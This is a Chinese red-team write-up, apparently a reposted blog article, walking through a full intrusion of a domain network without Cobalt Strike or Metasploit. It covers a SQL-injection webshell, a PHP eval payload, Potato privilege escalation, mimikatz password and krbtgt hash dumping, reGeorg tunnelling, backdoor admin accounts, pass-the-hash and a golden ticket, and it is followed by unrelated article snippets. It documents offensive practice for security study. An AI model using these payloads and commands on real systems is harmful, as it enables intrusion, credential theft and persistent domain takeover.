红队攻防实战之从边界突破到漫游内网(无cs和msf)

news2025/1/11 5:20:26

也许有一天我们再相逢,睁大眼睛看清楚,我才是英雄。

本文首发于先知社区,原创作者即是本人

本篇文章目录

在这里插入图片描述

网络拓扑图:

本次红队攻防实战所需绘制的拓扑图如下:

在这里插入图片描述

边界突破

访问网站:

http://xxx.xxx.xxx/?id=1

首页如下:

在这里插入图片描述

SQL注入拿shell

构造payload:and 1=1显示正确,and 1=2显示错误,说明存在SQL注入,并且爆出绝对路径

在这里插入图片描述

使用常用的注入函数into outfile 将一句话木马写入自动创建的 xxx.php文件中

http://xxx.xxx.xxx/?id=1 and 1=2 union select 1,'<?php @eval($_REQUEST[xxx]);?>' into outfile 'x:\\xxx\\xxx\\xxx.php'

需要有写入权限和上一步爆出的绝对路径

在这里插入图片描述

验证上传的木马是否成功,成功写入木马

http://xxx.xxx.xxx/xxx.php?xxx=phpinfo();

在这里插入图片描述

成功利用蚁剑拿到shell

在这里插入图片描述

内网信息收集

whoami
发现是普通用户的权限

在这里插入图片描述

ipconfig /all
查看用户的IP信息,可以看到位于工作组环境

在这里插入图片描述

route print
查看路由,通往10.0.1网段

在这里插入图片描述

net config Workstation
查看计算机名、全名、用户名、系统版本、工作站

在这里插入图片描述

利用蚁剑传入Potato提权工具,并使用其虚拟终端,查看权限,提权。
将超时时间调大:

在这里插入图片描述

上传Potato提权工具成功,改名为xxx.exe

在这里插入图片描述

使用命令可以看到成功提权
xxx.exe -p “whoami”

在这里插入图片描述

将mimikatz改名为x.exe,成功上传

在这里插入图片描述

然后在终端执行

xxx.exe -p "x.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt"

在这里插入图片描述

查看log.txt,成功抓到当前用户和另一用户的密码

在这里插入图片描述

在这里插入图片描述

netstat -ano查看是否开启3389端口,发现已开启

在这里插入图片描述

查看防火墙是开启的
netsh firewall show state

在这里插入图片描述

reGeorg内网穿透

使用软件reGeorg实现攻击机与目标机器的通信
通过蚁剑将reGeorge中的tunnel.php上传至网站改名为tu.php

在这里插入图片描述

并成功访问

http://xx.xx.xx/tu.php

在这里插入图片描述

启动reGeorg

python3 xx.py -k xxx -u http://xx.xx.xx/tu.php

表示本地1080端口的流量都转发给指定的那个url,1080是指定的监听端口;

在这里插入图片描述

代理可以使用:

在这里插入图片描述

内网渗透

拿下边界服务器

挂上代理远程连接10.0.1.4

在这里插入图片描述

创建新账号admin 并提权

xx.exe -p "net user xxx xxxx /add" //新增账号和对应密码
xx.exe -p "net localgroup administrators xxxx /add"//提升新增账号的权限至administrators组

在这里插入图片描述

远程连接

在这里插入图片描述

成功连接

在这里插入图片描述

将mimikatz添加到桌面并以管理员权限运行
privilege::debug 提升权限
log 日志会记录内容
sekurlsa::logonpasswords 抓取密码

在这里插入图片描述

成功抓到管理员账户密码:
使用上述管理员账号密码,成功登陆服务器

在这里插入图片描述

通过nbtscan对当前C端进行扫描,发现还有三台机器存活

在这里插入图片描述

拿下域内主机

根据我这个攻防时长两年半的个人练习生的经验来判断,内网里的服务器的账号密码有部分可能是相同的。
再使用上述管理员账号密码远程连接10.0.1.8

在这里插入图片描述

成功连接

在这里插入图片描述

whoami查看是administrator权限
ipconfig /all查看有域xx.xx

在这里插入图片描述

一般DNS服务器就是域控服务器

在这里插入图片描述

查询域控主机名,遭拒绝,需利用官方工具将账号提升至system权限再查
net user /domain

在这里插入图片描述

上传官方工具PsExec.exe提权
PsExec.exe -i -s -d cmd 提升至system权限,获取主机名DC.xx.xx

在这里插入图片描述

尝试访问域控主机C盘
dir \DC.xx.xx\c$

在这里插入图片描述

是拒绝的,需要工具minikatz,使用哈希传递

拿下域控

将mimikatz添加到桌面并以管理员权限运行
privilege::debug 提升权限
log 日志会记录内容
sekurlsa::logonpasswords 抓取密码

在这里插入图片描述

获取

user=administrator
Domain=xxx
NTLM=xxxxxxx

将上述值放入下方命令中,完成哈希传递,以后利用这个CMD窗口运行,拥有管理员权限。

sekurlsa::pth /user:administrator /domain:"xx.xx"
/ntlm:xxxxxxx

启动域控主机cmd窗口,成功访问域控主机C盘
dir \DC.xx.xx\c$

在这里插入图片描述

使用官方工具PsExec.exe,命令如下:
PsExec.exe \dc.xx.xx cmd
进入c:
输入ipconfig, 10.0.1.6为域控ip,此时成功获取域控cmd

在这里插入图片描述

新建账号,直接远程登陆域控主机

"net user xxx xxxx /add" //新增账号和对应密码
"net localgroup administrators xxxx /add"//提升新增账号的权限至administrators组

在这里插入图片描述

建好账号后,直接登陆域控主机10.0.1.6(DC.xx.xx),成功拿下域控主机权限

在这里插入图片描述

至此已成功拿下三台主机的权限。

在这里插入图片描述

权限维持

可通过制作黄金票据进行权限维持
因为域控主机10.0.1.6安装了补丁KB2871997,所以无法抓取到明文密码
管理员运行猕猴桃
log 日志记录内容
lsadump::dcsync /user:krbtgt 获取内容

在这里插入图片描述

获取krbtgt账号的关键值(OSID和Hash_NTLM)

在这里插入图片描述

制作黄金票据

kerberos::golden /admin:administrator /domain:xx.xx /sid:xx-xx-xx /krbtgt:xxxxxx /ticket:xxx.kiribi

如图

在这里插入图片描述

票据加载成功

在这里插入图片描述

普通窗口无法访问域控根目录

在这里插入图片描述

把域控中的票据复制到在10.0.1.8主机中,使用猕猴桃加载票据
kerberos::ptt xxx.kiribi 加载票据

在这里插入图片描述

然后成功在普通cmd中访问域控c盘内容
dir \DC.xx.xx\c$

在这里插入图片描述

PExec.exe \DC.xx.xx cmd 获取域控cmd

在这里插入图片描述

网络安全感悟

做网络安全是一个长期的过程,因为做网络安全没有终点,不管是网络安全企业,还是在网络安全行业各种不同方向的从业人员,不管你选择哪个方向,只有在这条路上坚持不懈,才能在这条路上走的更远,走的更好,不然你肯定走不远,迟早会转行或者被淘汰,把时间全浪费掉。如果你觉得自己是真的热爱网络安全这个行业,坚持走下去就可以了,不用去管别人,现在就是一个大浪淘金的时代,淘下去的是沙子,留下来的才是金子,正所谓,千淘万漉虽辛苦,吹尽狂沙始到金,网络安全的路还很长,一生只做一件事,坚持做好一件事!

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:各家兴 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。

CSDN:
https://blog.csdn.net/weixin_48899364?type=blog

公众号:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect

博客:
https://rdyx0.github.io/

先知社区:
https://xz.aliyun.com/u/37846

SecIN:
https://www.sec-in.com/author/3097

FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1248030.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Java之异常(下):自定义异常类

一、前言&#xff1a; 在我前面写的博客文章里有一篇叫《Java中关于自定义异常类的一些问题》&#xff0c;它里面讲到了大部分关于自定义异常的基础知识&#xff0c;如果大家想了解底层可以去那里查看。今天我将用一次细节的案例解析&#xff1a;我们所说的自定义异常类。 二、…

【学习篇】Linux中grep、sed、awk

Linux 文本处理三剑客 – awk, sed, grep grep过滤文本 https://zhuanlan.zhihu.com/p/561445240 grep 是 Linux/Unix 系统中的一个命令行工具&#xff0c;用于从文件中搜索文本或字符串。grep 代表全局正则表达式打印。当我们使用指定字符串运行 grep 命令时&#xff0c;如…

VMware安装windows操作系统

一、下载镜像包 地址&#xff1a;镜像包地址。 找到需要的版本下载镜像包。 二、安装 打开VMware新建虚拟机&#xff0c;选择用镜像文件。将下载的镜像包加载进去即可。

(Matalb回归预测)GA-BP遗传算法优化BP神经网络的多维回归预测

目录 一、程序及算法内容介绍&#xff1a; 基本内容&#xff1a; 亮点与优势&#xff1a; 二、实际运行效果&#xff1a; 三、部分代码&#xff1a; 四、分享本文全部代码数据说明手册&#xff1a; 一、程序及算法内容介绍&#xff1a; 基本内容&#xff1a; 本代码基于M…

如何在 Web 应用程序中查找端点?

如何在 Web 应用程序中查找端点? 这篇文章主要讲述了如何在网络应用中找到端点。以下是文章的主要要点: 端点是网络服务的访问地址,通过引用这个URL,客户可以访问服务提供的操作。端点提供了寻址Web服务端点所需的信息。 HTTP消息是服务器和客户端之间交换数据的方式,包…

2023年c语言程序设计大赛

7-1 这是一道送分题 为了让更多的同学参与程序设计中来&#xff0c;这里给同学们一个送分题&#xff0c;让各位感受一下程序设计的魅力&#xff0c;并祝贺各位同学在本次比赛中取得好成绩。 注&#xff1a;各位同学只需将输入样例里的代码复制到右侧编译器&#xff0c;然后直…

电子作业指导书系统如何提高作业人员的培训效率和作业规范

在现代制造业中&#xff0c;提高生产效率和产品质量是企业不断追求的目标。而对于车间员工来说&#xff0c;如何提高生产培训效率和作业规范是一个重要的问题。电子作业指导书系统作为一种新型的生产管理工具&#xff0c;可以有效提高车间员工的生产培训效率和作业规范。本文将…

maven 将Jar包安装到本地仓库

window系统&#xff1a; 注意事项&#xff1a;在windows中&#xff0c;使用mvn指令将jar安装到本地仓库时&#xff0c;一定要将相关资源使用“"”包裹上&#xff0c;不然会报下面的错&#xff1a; mvn install:install-file "-DfileD:\BaiduNetdiskDownload\qianzixi…

全球服的游戏服务器架构设计

全球服的游戏服务器架构设计 版权声明 本文为“优梦创客”原创文章&#xff0c;您可以自由转载&#xff0c;但必须加入完整的版权声明 文章内容不得删减、修改、演绎 相关学习资料见文末 主题 常见服务器端架构划分 不同类型游戏的架构选择与瓶颈 如何设计通用、可伸缩的…

python 爬百度热搜并生成词云

1、爬取百度body存入txt def get_baidu_hot():url "https://top.baidu.com/board?tabrealtime"headers {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3&…

定制手机套餐---python序列

if __name__ __main__:print("定制手机套餐")print("")#定义电话时长&#xff1a;字典callTimeOptions{1:0分钟,2:50分钟,3:100分钟,4:300分钟,5:不限量}keyinput("请输入电话时长的选择编号&#xff1a;")valuecallTimeOptions.get(key)if val…

看完就会,从抓包到接口测试的全过程解析【1500字保姆级教程】

一、为什么抓包 1、从功能测试角度 通过抓包查看隐藏字段 Web 表单中会有很多隐藏的字段&#xff0c;这些隐藏字段一般都有一些特殊的用途&#xff0c;比如收集用户的数据&#xff0c;预防 CRSF 攻击&#xff0c;防网络爬虫&#xff0c;以及一些其他用途。这些隐藏字段在界面…

中国上市公司漂绿程度及其同构指数(多种测算方法,2012-2022年)

数据简介&#xff1a;20 世纪 90 年代开始&#xff0c;国际上关于绿色市场和绿色管理的学术文献日渐丰富&#xff0c;众多企业积极响应碳排放政策的号召&#xff0c;但其中有多少企业是实实在在的进行碳减排技术创新&#xff0c;又有多少企业打着绿色低碳行为的口号来吸引眼球、…

举个栗子!Quick BI 技巧(4):创建面积图

面积图又叫区域图&#xff0c;是在折线图的基础之上形成的, 它将折线图中折线与自变量坐标轴之间的区域使用颜色或者纹理填充&#xff0c;这样一个填充区域我们叫做面积&#xff0c;颜色的填充也可以更好的突出趋势信息。 有数据粉好奇如何使用 Quick BI 来制作面积图&#xf…

CAD图纸管理软件是否支持自定义属性?

CAD图纸管理软件是否支持自定义属性&#xff1f; 彩虹图纸管理软件_图纸管理系统_图纸文档管理软件系统_彩虹EDM【官网】 CAD图纸管理软件 是一种专业用于管理CAD图纸的工具&#xff0c;它可以帮助用户更加方便地管理、分类和检索自己的CAD图纸。在这个软件中&#xff0c;自定…

沃趣班11月月考题目解析

沃趣班11月月考题目解析 1.在oracle中创建用户时&#xff0c;若未设置default tablespace关键字&#xff0c;则oracle将哪个表空间分配给用户作为默认表空间 答案&#xff1a;D.user SQL> create user mytest identified by 123456; SQL> grant connect to mytest; SQL…

【开源】基于Vue和SpringBoot的独居老人物资配送系统

项目编号&#xff1a; S 045 &#xff0c;文末获取源码。 \color{red}{项目编号&#xff1a;S045&#xff0c;文末获取源码。} 项目编号&#xff1a;S045&#xff0c;文末获取源码。 目录 一、摘要1.1 项目介绍1.2 项目录屏 二、功能模块三、系统展示四、核心代码4.1 查询社区4…

色彩 (3)AWB问题

#灵感# AWB 的问题&#xff0c;说难其实也不是很难。 前提&#xff1a; 对于特定的光信号输入&#xff0c;设备的输出信号取决于RGB三通道的频率响应&#xff0c;不同的sensor频率响应一般是不同的。QE曲线描述的就是图像传感器的光电转换效率. 1、灰区设置 标定用标准光源灯…

应用场景丨隧道健康监测系统建设,提高隧道的应急措施

在繁忙的城市交通中&#xff0c;隧道作为重要的枢纽&#xff0c;每天承载着大量的车流和人流。然而&#xff0c;隧道内部的环境和结构状况往往难以掌握&#xff0c;给交通安全带来了潜在的隐患。为了解决这一问题&#xff0c;建立隧道健康监测系统势在必行。 根据《交通运输部关…

【Unity入门】碰撞检测

碰撞器由来 1.系统默认会给每个对象(GameObject)添加一个碰撞组件(ColliderComponent)&#xff0c;一些背景对象则可以取消该组件。 2.在unity3d中&#xff0c;能检测碰撞发生的方式有两种&#xff0c;一种是利用碰撞器&#xff0c;另一种则是利用触发器。这两种方式的应用非…